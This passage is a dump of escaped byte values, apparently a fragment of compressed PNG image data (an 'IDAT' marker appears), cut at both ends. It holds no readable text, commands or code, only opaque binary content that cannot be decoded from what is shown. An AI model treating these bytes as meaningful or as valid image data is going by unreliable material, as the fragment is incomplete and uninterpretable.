\\x0c\\\n\\x00\\xffv\\x05\\x80\\x8f\\xf4H\\xa5>}\\xce\\xd2\\xe2\\xe1\\xe1\\\n\\x01\\xfb\\xf6\\xed\\x03WWW\\xf2\\x18\\xd4\\x05R\\xd7\\xae]\\\nCGwy;\\xb4\\x94\\x17\\xa2\\xfa\\x9erP_\\x16\\x04\\\n\\xd4\\x06\\xe6\\xde\\xd5:\\x8dj\\xb5Zr\\xb9\\xae\\x81\\x03\\x07\\\n\\xa2S\\x1b\\xaaC\\x89\\xd0FGGKv\\xea\\x06\\x0e\\x1c\\\n\\xc8=\\xff\\x1f{=\\xb8\\xba\\xba\\xca\\x9a/\\xe4\\xe8\\x06\\x00\\\n\\x08\\x08\\x08 \\xa7\\x1d\\xd57\\x87\\x16\\xe0\\xe1\\xba\\x81\\xdd\\xbb\\\nw\\xcb\\x0a(}\\xf7\\xddw\\xa8\\xceP\\xa6\\x14\\xa1\\x8d\\x8b\\\n\\x8bC\\xcb(\\xe9\\xd0>m\\xf3?@\\x03uh\\x1bJ\\\n\\x84\\x96g\\xfeYu\\xea\\xd3\\x85R\\x9d\\x16-Z\\xc0\\xba\\\nu\\xeb\\xc8u\\x1d\\x8f\\x1c9\\x02W\\xaf^E\\xcbQ*\\\n\\x1c\\x98\\x82C[\\x9f\\xdf\\xd0\\x8b\\x8b\\x8b!##\\x03%\\\nc\\x0a\\xd7\\xa8\\x16\\x8c\\xb3\\xa9u\\x1aO\\x9e<\\x09yy\\\ny\\x92d\\xe4\\xa4\\x1b\\x00\\xd0\\x22\\xb4\\xc6L7\\xc8\\xcc\\xcc\\\nD\\xdf\\x03\\xf55\\x7f\\x96\\xa2\\xcfT\\xd2m\\xdc\\xdc\\xdc`\\\n\\xeb\\xd6\\xad`mmM\\x92\\xbfu\\xeb\\x16*O\\xdbT\\\n\\x22\\xb4\\x1a\\x8d\\x06N\\x9d:\\x85\\x96\\x13\\x11Z\\xdd`\\xef\\\n\\x01\\x0f\\x0f\\x0f\\xc5\\x82\\x80\\xfa\\x90\\xe4\\xd0Rk\\xd0\\x9a\\xd2\\\n\\x83M\\x0b\\xc5!Q\\xaa\\x9e\\x1av\\x12\\xb0\\xb0\\xb00z\\\n;Q-c\\xc7\\x8e\\x85\\xd7^{\\x8d,\\xbfy\\xf3f\\\n\\xb4\\x8c)\\x94\\xec2\\xa5\\x17\\x22Cp\\xeb\\xd6-tT\\\n\\xdc\\x14\\x9a*h\\xa1Dh\\xff\\xfc\\xf3OI\\xfb\\x9b\\x99\\\n\\x99\\xc9\\xceW\\xc4Fh\\x19c\\xb0g\\xcf\\x1eI2\\xe6\\\n\\xe6\\xe6\\xe8\\xeee\\xfa0\\xf6K\\xb8!\\x0b\\xbcS\\xf2u\\\nM%\\xdd\\x06\\xe0aY\\xa6O?\\xfd\\x94,\\x8f\\x99\\xa3\\\n\\xb1\\xbf\\x8b\\x8b\\x8b\\x0b\\xb8\\xbb\\xbbcM\\xd2\\xcb\\xe5\\xcb\\x97\\\nIs4\\xa6)\\x0a6\\xed\\xac>\\xcf\\xff\\x00\\xf5\\xeb\\x0b\\\n\\x9db\\x11Z\\x07\\x07\\x07\\xf0\\xf4\\xf4D\\xcb)\\x0d%\\xe5\\\n@\\x89\\x0b2??\\x1f\\xb2\\xb2\\xb2P2~~~\\xdc\\\nz\\xb1\\xf3`\\xf9\\xf2\\xe5\\xe4\\xdfx\\xfb\\xf6\\xedh\\x19\\xac\\\nC\\xeb\\xe6\\xe6\\xc6\\xbd\\xf6\\x9f\\xd4\\xceL\\xd51v\\x0bX\\\n9\\x18\\xdb\\x81\\x91\\x0b%B+\\xd5\\xa1\\xed\\xd1\\xa3\\x87\\xec\\\n\\xfczl\\x84\\xf6\\xfc\\xf9\\xf3\\x92;\\xd5\\xf5\\xed\\xdb\\x97\\xfb\\\n\\x1cl\\xec\\xeb\\xc1\\x90\\xfa)\\xf9\\xba\\xa6t\\xed\\x03\\xdaZ\\xb7n\\x0d\\x81\\x81\\x81\\xe0\\xef\\xefO\\xae\\\n\\x8c\\x91\\x94\\x94\\x84N\\xb10\\xb5\\xfb\\x1e\\xeb\\xd0J\\xc1\\xcb\\\n\\xcb\\x0bz\\xf5\\xeaE5\\xe91\\xa4:\\xb4eeep\\\n\\xe8\\xd0!I\\xfbv\\xec\\xd8Q\\x91\\xdf\\xc1\\xd8\\x11KC\\\n\\xea\\xa7\\xe4\\xeb\\xfa\\xf8\\xf8\\x98T\\xbaMM\\xda\\xb4i\\x83\\\n^\\x88+e\\x8e\\xa6Dh)\\xa9[u\\x11\\x1f\\x1fO\\\n\\xca\\xaf\\x9e4i\\x12Z\\xc6\\xc1\\xc1\\x01U\\xed\\x86RY\\\nI*?\\xfc\\xf0\\x03,\\x5c\\xb8\\x10\\x5c]]!00\\\n\\x10Z\\xb5j\\x05\\xadZ\\xb5z\\xecY 'e\\xb2\\xbe\\\n}\\xa1\\xd3\\xeb\\xd0RB\\xce\\xd6\\xd6\\xd6\\xe4V\\x83JC\\\n\\x99p(\\xd1T]\\x14\\x16\\x16\\xc2o\\xbf\\xfd\\x86\\x96k\\\n\\xda\\xb4)\\xb9H\\xb6!\\xb0\\xb5\\xb5E\\xcb`\\xea5b\\\nK\\x87\\xd8\\xda\\xda*\\xd2\\xa1\\xc5\\x94\\x1c\\xda\\xabW\\xaf>\\\n\\xea\\x8a\\x93\\x92\\x92\\x02)))O8=\\x96\\x96\\x96\\xe0\\\n\\xef\\xef\\xffh\\xb2{\\xef\\xbd\\xf7\\xc0\\xcb\\xcbK\\xd2\\xf8\\xc6\\\nv`x\\x80I9\\x90\\xfa;\\x8d\\x193\\x86[\\x84\\x09\\\n\\x93r 5zl*\\xe9\\x06\\x00\\xc6o\\xaa@\\xfdR\\\nH\\xc9\\xd75\\xb5k\\xbf&J\\xcc\\xd1\\x15\\x15\\x15p\\xe7\\\n\\xce\\x1d\\xf4\\xb8\\x94\\xf2\\x87u\\x11\\x11\\x11\\x81\\x96\\xe9\\xd8\\xb1\\\n#\\xb4i\\xd3\\x06-\\xe7\\xe4\\xe4\\x84\\x8a\\x8a\\xe6\\xe6\\xe6\\xa2\\\nuHe\\xfd\\xfa\\xf5\\x00\\xf0\\xd0G9}\\xfa4\\x9c>\\\n}\\xfa\\x89}\\xbc\\xbc\\xbc\\x1e\\x058&O\\x9e,y\\x11\\\n\\x1cc\\x0c\\xfd\\x92`\\xec{@\\x91\\x08\\xad\\xbf\\xbf\\xbf\\xc9\\\n\\xe6\\x8dP\\x1cm\\xca\\x0d\\xab\\x8b\\xf0\\xf0p\\xd2\\x1b\\x9b\\xbe\\\n\\x0b\\xa5\\xbc\\xbc\\x1c\\xd6\\xad[\\x07\\xf9\\xf9\\xf9PRR\\x02\\\neee\\x90\\x97\\x97\\x07\\xa5\\xa5\\xa5PVV\\x06\\xb9\\xb9\\\n\\xb9PVV\\x06\\xa5\\xa5\\xa5\\x90\\x97\\x97\\x07eeep\\\n\\xfd\\xfauT\\xaf\\xfb\\xba\\xa0\\x94h\\xc3L\\xb0X\\x87\\xd6\\\n\\xdd\\xdd]\\x91\\xb2q\\x14\\x87\\x16\\x93+\\x8ca\\xdd\\xbau\\\nz\\xf7\\xa9\\xac\\xac\\x84\\x1b7n\\xc0\\x8d\\x1b7\\xe0\\xc4\\x89\\\n\\x13\\xf0\\xc5\\x17_H\\x1e\\xbf!8\\xb4r\\xda\\xd2\\xeaB\\\nnw\\xb0\\xeaHuh1(\\x91n\\x00`\\xfcV\\xdd\\\n\\x0d\\xa1dWxx8dffBii\\xe9cs\\\nqII\\x09\\xe4\\xe7\\xe7CYY\\x19\\x14\\x17\\x17CA\\\nA\\x01\\x94\\x95\\x95\\xc1\\x81\\x03\\x07\\xb8,>\\x04Pf\\x8e\\\n\\xa6\\x94\\xec\\x02\\xe0\\xfbL-..\\x86\\xf0\\xf0p\\xb4\\x1c\\\n%:\\x0b\\x80\\x7f\\x06(5\\xff\\xc7\\xc5\\xc5\\xc1\\x95+W\\\n\\xf4\\xee\\x97\\x91\\x91\\x01\\x19\\x19\\x19\\xf0\\xd7_\\x7f\\xa1\\xe6\\xae\\\n{\\xf7\\xee\\xa1\\xd3-\\x8d=\\xff+\\xe2\\xd0\\x1a\\xfb\\xa0\\xea\\\n\\x82\\xb2\\xe2\\x15[4Z\\x17\\x1a\\x8d\\x06\\xbe\\xfb\\xee;\\x92\\\n\\xac\\xbes\\xaa\\xd1h`\\xce\\x9c9\\xa81\\xef\\xde\\xbd\\xcb\\\n\\xad\\x93\\x16&\\x1fV\\x8b\\xd4U\\xd8\\x1a\\x8d\\x06=\\x01*\\\n\\xd5\\xdd\\x8d\\xe2 ]\\xbe|\\x99\\xbb\\x1d\\xf9\\xf9\\xf9\\xf0\\xcb\\\n/\\xbf\\xa0dF\\x8f\\x1e\\x8d\\x8a\\x8ac\\xef}\\x95Je\\\nr\\xb9\\xf3\\xbc[0:::\\xc2\\xa0A\\x83\\xb8\\x8d\\xc7\\\n\\xdb\\xa1m\\xd5\\xaa\\x15\\x04\\x05\\x05q\\x1dS\\x8b1\\x9f\\x05\\\n\\x8c1\\x83.PQ\\xeaX\\xdf\\x7f\\xff}\\xd4\\x5c\\x99\\x9c\\\n\\x9c\\xcc\\xcd\\xa1\\xa58V\\xfa\\xe6hjJ\\x22u\\xb1y\\\nml\\xda\\xb4\\x89\\xf4\\x15\\xccP\\x0e\\xad\\x14\\xa7\\x93\\xc2\\xca\\\n\\x95+Q\\xfb;99\\xa1J\\x94\\xd5G\\xdf\\xaf\\xce\\xef\\\nf\\x0f\\x1e< \\x85\\xcbM\\xed\\xa1V\\x1dJ)\\x1b^\\\n\\x17ddd$\\x5c\\xbf~\\x9d$\\xab\\xefB\\xb1\\xb5\\xb5\\\nE\\xaf\\xe6\\xa5\\xe4\\x1c\\xd5Faa!)-C\\xea\\xa2\\\n-m\\xe4\\x02\\x83\\x12\\x919\\x80\\x87I\\xef\\xd8\\xaf\\x0fJ\\\n8\\xb4\\xdf~\\xfb-z\\x12\\x9fS\\x9e\\xa3S\\\nRR\\xe0\\xfe\\xfd\\xfbh9}\\xc7D\\xf5\\x11\\x0e\\x1f>\\\n\\x8c\\xae+^\\x1b\\x11\\x11\\x11\\xa4 \\xd1\\xfc\\xf9\\xf3\\xc9:\\\n\\xb1_5\\x19c\\xdc~G-\\x1f\\x7f\\xfc1za\\xdd\\\n+\\xaf\\xbc\\x82\\xda\\xbf\\xbe\\x95\\xec\\x02P\\xc8\\xa15\\xe5\\x08\\\n-\\xa5\\x94\\x13c\\x0cbcce\\xe9\\xfd\\xfe\\xfb\\xef%\\\n\\xb7\\xd4\\xac\\x0d)\\x17\\x0a\\xf6\\xe1\\x81)\\x03T\\x17\\xd4s\\\n\\xd3\\xb3gOI\\xfbQ\\x1cZ\\xde\\xa5\\xd6\\xaa\\x83]H\\\nP\\x5c\\x5cL\\xea`\\xa3\\x8b7\\xdf|\\x13\\x1d\\x11\\x9f>\\\n}:*\\x82O\\xe9\\xcfn\\xec\\xc9\\xac6xFh-\\\n--a\\xe4\\xc8\\x91\\xdc\\xc6\\x03\\xe0\\xeb\\xd0\\xfa\\xf9\\xf9A\\\n\\xb7n\\xdd\\xb8\\x8dW\\x9d\\x07\\x0f\\x1e\\xa0\\xaf9\\x9e\\xd7\\x83\\\n\\xa1\\x1f\\xaeJ\\xa5\\xdb`\\xe7\\xe8C\\x87\\x0eqY@\\xa5\\\n\\xd4\\x1cM\\x8d\\xd0\\x16\\x16\\x16J\\xae\\xf9\\xac\\x8b\\xe2\\xe2b\\\nX\\xb2d\\x09Z\\xce\\xcb\\xcbKV\\x9e9%M\\x8f\\xd7\\\n\\xb3\\x16\\x00`\\xd7\\xae]\\xb0c\\xc7\\x0e\\x94L\\xabV\\xad\\\n\\xa0_\\xbf~(\\x19\\xec=\\xd0\\xa8Q#E\\x16bc\\\n\\xa8\\xd3\\xa1\\xa5\\xe6\\xb9\\x98\\xb2C\\xdb\\xae];\\xd2g\\xd1\\\n-[\\xb6\\x90u\\xde\\xb8q\\x03>\\xf8\\xe0\\x03\\xb22\\xf5\\\n\\xdd9\\x00\\x00 \\x00IDAT\\xbc\\xd4\\xc9\\xb2]\\xbb\\\nv\\xa8q\\x13\\x13\\x13I\\x0d\\x1ej\\xb2i\\xd3&\\xb4L\\\n@@\\x80\\xe4O7\\x94NuJ\\xae,\\xa5Lh\\x94\\\nU\\xb8\\xb5\\xb1k\\xd7.t\\x95\\x0c+++\\x987o\\\n\\x1eJ&99\\x19\\xbd\\xd8\\xc3\\x14\\x1dZ\\x07\\x07\\x07n\\\n\\x0bT\\xfb\\xf7\\xef\\x0f...\\x5c\\xc6\\xd2\\xc2\\xd3\\xa1\\x1d\\\n?~\\xbc\\x22\\x0b!\\x01\\x8c\\xff\\xf9\\xd1\\x90\\xfa)\\xf9\\xba\\\n\\xde\\xde\\xde\\x92~K\\xec\\x1c]PP\\x00?\\xff\\xfc3\\\nJ\\xa66(s\\xb4\\xb5\\xb55t\\xee\\xdc\\xb9\\xce}\\xa8\\\nA/\\x00 \\xaf'\\xd1\\xf2\\xd1G\\x1f\\x91\\x16\\x97\\xbd\\xf6\\\n\\xdak\\xe4\\xc8=\\x00>\\xa0\\x01\\x00\\xf0\\xfb\\xef\\xbf\\x93\\x02\\\n35\\xb9\\x7f\\xff>z\\xad\\x0c\\x00\\xc0[o\\xbd\\x85\\x9e\\\n\\x1b\\xea\\xe3\\x17:\\xee\\x11ZS\\xae\\x97\\x0a\\xf0\\xf0\\xe1\\xde\\\n\\xbd{w\\xb4\\xdc\\xee\\xdd\\xbbI\\xd5\\x09\\x8a\\x8a\\x8a`\\xe2\\\n\\xc4\\x89PRR\\x82\\x96\\xd5\\x2257\\xb1}\\xfb\\xf6\\xe8\\\n\\xb1?\\xfc\\xf0C\\xc9\\xe5\\x80j#::\\x9a\\x94c\\x8c\\\ny[\\xa4\\xd4QMMM\\xe52\\x81\\xd4\\x06eB\\xdb\\\n\\xbe};\\xbaRCM\\xe2\\xe3\\xe3a\\xda\\xb4ih\\xb9\\\n\\x17_|\\x11]T\\xbd>~n\\xaa\\x0d\\x95J\\xc5m\\\n\\x81 \\xeft\\x03\\x00\\xbe\\x0e\\xadR\\xd5\\x0d\\x00\\xea\\xa7C\\\nK\\x0d\\xacP\\xf2u\\xa5\\x1e+\\xd6\\xa1\\x05\\x00\\xf8\\xfc\\xf3\\\n\\xcfe\\xe5`\\xde\\xb8q\\x03\\xf6\\xed\\xdb\\x87\\x96\\xeb\\xd1\\xa3\\\nG\\x9d9\\x97\\x15\\x15\\x15\\xb2\\x16LGFF\\x92\\xd7\\x17\\\n\\xc4\\xc6\\xc6\\xc2\\xb7\\xdf~\\x8b\\x96\\xb3\\xb6\\xb6\\x86\\xd7_\\x7f\\\n\\x9d\\xa4SK\\xeb\\xd6\\xad\\xd1\\xcea^^\\x1ez\\x11o\\\nMJKKa\\xec\\xd8\\xb1\\x90\\x91\\x91\\x81\\x92k\\xdc\\xb8\\\n1\\xcc\\x981\\x03\\xad\\x0f\\xfb\\x0c0\\x85\\xf9\\x9f{\\x84V\\\nN\\xde\\x92\\xa1x\\xe6\\x99g\\xd02\\xa5\\xa5\\xa5\\xe8\\xcf\\x1b\\\n\\x15\\x15\\x15\\xf0\\xfc\\xf3\\xcf\\xc3\\xa5K\\x97\\xd0\\xfa\\xaa#\\xf5\\\nB\\xe9\\xd8\\xb1#z\\xec\\x0b\\x17.\\xc0\\xdc\\xb9s\\xd1r\\\n\\x00\\x0f\\xcf\\x09U6,,L\\xf2\\xbe\\x94\\x88:c\\x0c\\\nN\\x9d:\\x85\\x96\\x93B\\xdf\\xbe}\\xd12j\\xb5\\x1a\\xde\\\n~\\xfbmrn\\xef\\x95+W`\\xd4\\xa8Qh'\\xdd\\\n\\xd2\\xd2\\x12\\xde\\x7f\\xff}\\xb4>c;0<\\xe1\\x91G\\\n\\xabR\\xa9`\\xec\\xd8\\xb1\\x1c\\xacy\\x1c^\\x0e\\xad\\x97\\x97\\\n\\x17\\xf4\\xe9\\xd3\\x87\\xcbX\\xb5a\\xec\\xeb\\xa1!\\x94\\xec\\x02\\\n\\x00\\x08\\x0e\\x0eF\\x8f\\x9d\\x91\\x91\\x01\\x93'O&\\x95\\xc7\\\nb\\x8c\\xc1k\\xaf\\xbd\\x86jb\\xa3E\\xdf\\x1c\\x9d\\x94\\x94\\\nD\\x1aW\\x0bc\\x0c\\xa6M\\x9b\\x86N\\x0fKJJ\\x82\\\n\\x89\\x13'\\x92t\\xcf\\x9d;\\x17\\x9a4i\\x82\\x96\\xab\\x8e\\\n\\x8b\\x8b\\x0b\\xa9\\xf2\\xc4\\xf2\\xe5\\xcb\\xd1\\x8d-\\xb4\\x94\\x94\\x94\\\n\\xc0\\xa4I\\x93\\xe0\\xe4\\xc9\\x93h\\xd9\\x7f\\xfe\\xf3\\x9f\\xe8g\\\nhFF\\x06\\xfaYc\\x12\\xf3?\\xab\\x03OOO\\x06\\\n\\x00\\xa8m\\xc8\\x90!u\\x0di\\x12\\xec\\xd9\\xb3\\x07}\\x5c\\\n\\x00\\xc0\\xcc\\xcd\\xcd\\xd9\\xf1\\xe3\\xc7%\\xe9(,,dc\\\n\\xc6\\x8c!\\xe9\\xa9\\xb9\\xcd\\x9c9S\\x92\\xce\\x07\\x0f\\x1e0\\\nKKK\\x92\\x8e\\xf9\\xf3\\xe7\\xb3\\x8a\\x8a\\x0a\\xc9\\xe7\\xb0\\xa4\\\n\\xa4\\x84\\x85\\x84\\x84\\x90t\\xb9\\xbb\\xbb\\xa3t%''\\x93\\\n\\xf4\\x84\\x84\\x84H\\x1a\\xbf\\xb0\\xb0\\x90}\\xf3\\xcd7\\x92\\xed\\\n\\xd1h4\\xcc\\xcb\\xcb\\x8bd\\xd3\\xe7\\x9f\\x7f.Y\\x8f\\x96\\\n-[\\xb60\\x07\\x07\\x07\\xf2\\xefJ\\xe1\\xcd7\\xdfD\\xe9\\\nQ\\xa9T\\xac\\xb0\\xb0\\x90\\xa4Ki:t\\xe8 \\xfb\\x1e\\\n\\xec\\xda\\xb5\\xab\\x22\\xb6UUU1\\x95J%\\xdb\\xbe\\xd9\\\n\\xb3g+b\\x9f\\x96\\x97^z\\x09mSll,7\\\n\\xfdNNNh\\xfd\\x97.]\\x22\\xe9Z\\xb3f\\x8db\\\n\\xf7uUU\\x15y\\xee\\x980a\\x02+((\\x90|\\\n\\x1cUUUl\\xe6\\xcc\\x99$]\\x16\\x16\\x16,##\\\n\\xa3\\xce\\xf1###e_\\xb7\\x00\\xc0\\x9e\\x7f\\xfeyV\\\n^^.\\xe9\\x98\\x92\\x92\\x92X\\x9b6mHz\\x1a5\\\nj\\xc4\\xee\\xdf\\xbf/\\xf9\\xfc\\xd5\\xc5\\xfc\\xf9\\xf3I6\\xf4\\\n\\xe9\\xd3\\x87\\x95\\x94\\x94\\xa0t\\xdd\\xbcy\\x93\\x05\\x07\\x07\\x93\\\n\\xf4\\xf9\\xf9\\xf9\\xb1\\xd2\\xd2R\\xf4\\xf1\\x1d?~\\x1c\\xadk\\\n\\xdd\\xbauh=\\xbc\\xd1\\xe9\\xd0\\x16\\x14\\x14\\x90N\\xe0\\xeb\\\n\\xaf\\xbfnH\\xfbI\\x14\\x14\\x140;;;\\xd2\\xf19\\\n;;\\xb3]\\xbbv\\xd59\\xfe\\xd1\\xa3G\\xc97]m\\\n\\xdb\\x8a\\x15+$\\x1f\\xdb\\xa0A\\x83\\xc8zz\\xf5\\xea\\xc5\\\nN\\x9d:\\xa5WG\\x5c\\x5c\\x1c\\xeb\\xdc\\xb93Y\\xcf[\\\no\\xbd%\\xf9x\\x18c\\xac\\xac\\xac\\x8c\\x99\\x9b\\x9b\\x93t\\\n-[\\xb6L\\xe7\\xb8\\xe5\\xe5\\xe5l\\xcd\\x9a5\\xcc\\xd7\\xd7\\\n\\x97\\x01\\x00\\xbbx\\xf1\\xa2d\\x9b^\\x7f\\xfdu\\xf2\\xf1\\xcf\\\n\\x9e=\\x9b=x\\xf0@\\xaf\\x8e\\xf8\\xf8x6j\\xd4(\\\n\\xb2\\x1e777\\x96\\x95\\x95%\\xf9\\x98\\xaa\\x83\\xd5\\xeb\\xed\\\n\\xedM\\xd2c\\x08\\x9ey\\xe6\\x19\\xd9\\xf7\\xe0\\xa7\\x9f~\\xaa\\\n\\x98}\\xb6\\xb6\\xb6\\xb2\\xed\\x8b\\x8a\\x8aR\\xcc>\\xc6\\x18\\xeb\\\n\\xdd\\xbb7\\xda\\xa6\\xcc\\xccL.\\xba333\\xd1\\xbaU\\\n*\\x15+..&\\xe9{\\xff\\xfd\\xf7\\xd1\\xfa\\xb6n\\xdd\\\n*y|\\xaa\\x93\\x09\\x00\\xacu\\xeb\\xd6l\\xef\\xde\\xbdz\\\nu\\x5c\\xbf~\\x9d\\x0d\\x1e<\\x98\\xacg\\xec\\xd8\\xb1zu\\\n|\\xfd\\xf5\\xd7\\xb2\\xaf[\\xed\\xd6\\xbbwo\\x96\\x9c\\x9c\\xac\\\nSWUU\\x15\\xdb\\xb4i\\x13svv&\\xebX\\xbe\\\n|\\xb9\\xe4\\xdfH\\x1fQQQd;\\xbav\\xed\\xca\\xe2\\\n\\xe3\\xe3\\xf5\\xea\\xc8\\xc9\\xc9a\\xef\\xbd\\xf7\\x1e\\xb3\\xb7\\xb7'\\\n\\xeb\\xda\\xb2e\\x0b\\xe9\\xf8\\xd6\\xaf_\\x8f\\xd6u\\xec\\xd81\\\n\\x92.\\x9e\\xe8th\\xcf\\x9f?O:\\x81_~\\xf9\\xa5\\\n!\\xed'3u\\xeaTY7`pp0[\\xb5j\\\n\\x15\\x8b\\x8c\\x8cdg\\xcf\\x9eeQQQ\\xec\\xab\\xaf\\xbe\\\nb\\xfd\\xfa\\xf5\\xe3v\\x93k\\xb7\\xed\\xdb\\xb7K>\\xae\\xd5\\\n\\xabW\\xcb\\xd67x\\xf0`\\xf6\\xfd\\xf7\\xdf\\xb3\\xf8\\xf8x\\\n\\x96\\x96\\x96\\xc6\\xb2\\xb2\\xb2\\xd8\\xa5K\\x97\\xd8\\xff\\xfe\\xf7?\\\n6d\\xc8\\x10Y\\x11%[[[\\x96\\x96\\x96\\x86\\xfe\\xbd\\\nZ\\xb6lI\\xd6\\xd9\\xaf_?\\xb6n\\xdd:v\\xfc\\xf8\\\nq\\x16\\x1b\\x1b\\xcb6o\\xde\\xccf\\xcf\\x9e\\xcd\\xbc\\xbd\\xbd\\\n\\x1f\\xdb\\x0f\\xe3hGGG\\xcb:\\xc7666l\\xc2\\\n\\x84\\x09\\xec\\xe7\\x9f\\x7ff{\\xf6\\xecag\\xce\\x9ca\\x7f\\\n\\xfd\\xf5\\x17\\xdb\\xb2e\\x0b[\\xb4h\\x11\\xeb\\xd4\\xa9\\x93\\xec\\\n\\xc8\\xdd\\x86\\x0d\\x1b\\xd0\\xe7Y\\x0b\\xf6\\x85\\xac_\\xbf~d\\\n]J#\\xe7\\xa5@\\xbba^v\\xb0\\xb8\\xbb\\xbb\\xcb\\xb2\\\n\\xcd\\xd5\\xd5\\x15\\xf5\\xc5\\xc3\\x106:99q\\xd3\\x1d\\x1b\\\n\\x1b\\x8b>'>>>d}aaah}R\\x1c\\\n\\x14-\\x07\\x0e\\x1c\\x90}=\\xf6\\xe8\\xd1\\x83}\\xf1\\xc5\\x17\\\n\\xec\\xf4\\xe9\\xd3,55\\x95\\xe5\\xe4\\xe4\\xb0\\xc4\\xc4D\\xb6\\\na\\xc3\\x066a\\xc2\\x04r\\x00\\x00\\xe0\\xe1\\xcb\\xc0\\xb9s\\\n\\xe7\\xf4\\x1e\\xc7\\xbcy\\xf3d\\x1fG\\xf5\\xcd\\xc2\\xc2\\x82\\x8d\\\n\\x1b7\\x8e\\xadY\\xb3\\x86EGG\\xb3\\x93'O\\xb2\\xed\\\n\\xdb\\xb7\\xb3O>\\xf9\\x84\\x05\\x04\\x04\\xc8\\x1a\\xdb\\xd7\\xd7\\x17\\\n\\x1d\\x19\\xad\\x8b\\xca\\xcaJ\\xd6\\xb8qcY6u\\xef\\xde\\\n\\x9d-_\\xbe\\x9c\\xfd\\xfe\\xfb\\xef,66\\x96\\x9d???Y\\xf6\\xcd\\x981C\\\nQ\\xfbrss\\xd16u\\xe9\\xd2\\x85\\x9b\\xfe\\xf0\\xf0p\\\n\\xb4\\xfe\\x01\\x03\\x06\\x90\\xf5Q\\xbe>\\xe5\\xe7\\xe7K\\x1e_\\\n\\xa3\\xd1\\xb0\\xae]\\xbb\\x1a}\\x8e\\xd0\\xb5\\x8d\\x1f?^\\xd2\\\nq\\x0c\\x1b6\\xcc\\xe8\\xb6J\\xd9T*\\x95\\x22_0\\x16\\\n-Zd\\xf4c\\xd3\\xb5\\xb9\\xbb\\xbb\\xb3{\\xf7\\xee\\x91\\x8f\\\n\\xed\\xf9\\xe7\\x9fG\\xe9stt\\xe4xf\\xe9\\xe8\\x5c\\x14\\\n\\xd6\\x10k\\xd0Vg\\xc8\\x90!\\xe0\\xed\\xedml3\\xf4\\\n\\x82m'jcc\\x03\\xef\\xbe\\xfb\\xae\\x82\\x16\\xd1\\xf1\\xf3\\\n\\xf3\\x83\\x8f>\\xfa\\x88$\\x8bi\\xd9G%;;[r\\\n\\x193333x\\xe3\\x8d7\\x14\\xb6\\x88F\\xf3\\xe6\\xcd\\\na\\xdd\\xbaud\\xf9\\xbbw\\xef\\xa2k_\\x9a\\xc4\\x82\\x00\\\n\\x1d\\xc8]\\x14\\x16\\x1a\\x1a\\xca\\xc9\\x92\\xda\\x91\\xbb0L\\xc9\\\n\\xea\\x06\\x00\\xb4g\\x01\\xb5\\x0bSm\\x18\\xba\\xe2\\x06V_\\\n\\xe3\\xc6\\x8dQ\\xf5\\x8eU*\\x15|\\xf8\\xe1\\x87X\\xb3\\x0c\\\n\\x82\\x93\\x93\\x13\\xacZ\\xb5J\\xd2\\xbe\\xd4\\x1a\\xb4\\x86\\xe6\\xad\\\n\\xb7\\xdeR\\xe4\\xf91g\\xce\\x1cR\\x05\\x1e\\xa5133\\\n\\x83_\\x7f\\xfdU\\xd6\\xe27\\xec=`*~\\x9fN\\x87\\\n\\x962\\x89\\x98b/w]\\x98\\x9b\\x9b\\x9b\\xacCR\\x1d\\\n///ppp@\\xc9\\xcc\\x993\\x87T\\xc2KI\\\n\\xcc\\xcc\\xcc <<\\x9c\\xec\\x5c\\x8c\\x1b7N\\xb1\\x1a\\x9b\\\n\\xd5\\xc18\\x82\\xb3f\\xcd\\x82\\xa6M\\x9b*h\\x0d\\x1eG\\\nGG\\xd8\\xb1c\\x87\\xacz\\xa9\\xc6^\\xd1\\xce\\x1b\\xb9\\xcd\\\n\\x15\\x94vh\\xb1\\xf7wu\\x1c\\x1d\\x1d\\x15\\x7f\\xd93\\xf6\\\n\\xf5`H\\xfd\\x99\\x99\\x99PPP\\xa0\\xb8\\xae\\xd0\\xd0P\\\n\\x18:t(ZNi\\xbe\\xfb\\xee;I\\xcd\\x87**\\\n*H5`\\x0dMPP\\x10|\\xfe\\xf9\\xe7\\x8a\\x8c\\xdd\\\n\\xacY3\\x989s\\xa6\\x22c\\xcb\\xe1\\xb3\\xcf>\\x83\\xe1\\\n\\xc3\\x87\\xcb\\x1a\\xa3>\\xd6\\xa0\\x05\\xa8\\xc3\\xa1\\xa5L\\x22^\\\n^^\\xdc[9*\\xc9\\xfc\\xf9\\xf3\\xd1}\\x99\\xe5\\xe0\\xe7\\\n\\xe7\\x87\\xfe\\xe1)/\\x08\\xb6\\xb6\\xb6\\xf0\\xdbo\\xbf\\xa1\\xfa\\\n6+\\xcdg\\x9f}\\x06\\x03\\x06\\x0c \\xcb7k\\xd6\\x0c\\\n\\xfa\\xf7\\xef\\xcf\\xd1\\xa2\\xda\\xd9\\xb7o\\x1fdffJ\\xda\\\n\\xd7\\xc6\\xc6\\x06\\x96-[\\xa6\\xb0E\\xd2\\xb1\\xb2\\xb2\\x82\\x1d\\\n;v\\xe8-\\x86\\xae\\x8f\\x86R\\x83V\\x8b\\x1c\\x87\\xd6\\xdd\\\n\\xdd\\x9dT\\xe6\\x0f\\x83\\x9c9s\\xd4\\xa8Q`cc\\xc3\\\n\\xd1\\x9a'\\xa9\\x8f\\x0e-5\\xb0b\\xa8k_\\xa5R\\xc1\\\n\\xfa\\xf5\\xeb\\xc1\\xdd\\xdd\\x1d-\\xab\\x14\\xb3f\\xcd\\x92\\x5c\\xe7\\\n\\xfa\\xf6\\xed\\xdb\\xb2Jv\\x19\\x02\\x17\\x17\\x17\\xd8\\xbcy\\xb3\\\n\\xa2\\xf7\\xc7G\\x1f}\\xc4\\xbd\\xbd\\xb6\\x1c\\xe6\\xcd\\x9bG*\\\n\\xd3X\\x9d\\x9c\\x9c\\x1ctc\\x22S\\x99\\xff\\xb9:\\xb4\\xa6\\\nrPRqtt\\x84/\\xbf\\xfc\\xd2 